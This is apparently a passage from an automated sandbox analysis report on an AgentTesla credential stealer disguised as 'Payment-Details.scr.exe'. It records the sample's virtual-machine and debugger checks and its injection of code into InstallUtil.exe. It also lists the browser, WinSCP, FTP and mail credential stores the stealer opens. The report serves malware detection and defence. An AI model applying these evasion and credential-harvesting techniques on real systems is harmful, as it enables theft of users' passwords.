                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97561
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96900
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799907
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799782
                    Source: InstallUtil.exe, 00000009.00000002.2700908180.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: InstallUtil.exe, 00000009.00000002.2700908180.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: Fdimzk.exe, 00000005.00000002.2100971081.0000000002F0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: Fdimzk.exe, 00000005.00000002.2100971081.0000000002F0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: Fdimzk.exe, 00000005.00000002.2124173104.000000000410B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVBox
                    Source: Payment-Details.scr.exe, 00000000.00000002.1674818011.0000000001482000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2023490581.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2012119620.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2097879038.000000000128E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2116445319.00000000060E0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2713649134.0000000006000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 2EC008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D7A008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B32008
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeQueries volume information: C:\Users\user\Desktop\Payment-Details.scr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeQueries volume information: C:\Users\user\AppData\Roaming\Fdimzk.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeQueries volume information: C:\Users\user\AppData\Roaming\Fdimzk.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 5.2.Fdimzk.exe.41206f0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Fdimzk.exe.382ec18.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment-Details.scr.exe.4513690.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Fdimzk.exe.382ec18.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Fdimzk.exe.41206f0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2016324901.00000000023AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2016324901.0000000002381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2041551021.0000000003819000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2101369596.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2101369596.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2012136822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2700908180.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2101369596.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2700908180.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2016324901.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2700908180.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2013699239.0000000002B02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2124173104.000000000410B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payment-Details.scr.exe PID: 432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fdimzk.exe PID: 6012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fdimzk.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2740, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2852, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 5.2.Fdimzk.exe.41206f0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Fdimzk.exe.382ec18.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment-Details.scr.exe.4513690.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Fdimzk.exe.382ec18.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Fdimzk.exe.41206f0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2016324901.0000000002381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2041551021.0000000003819000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2101369596.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2012136822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2013699239.0000000002B02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2124173104.000000000410B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
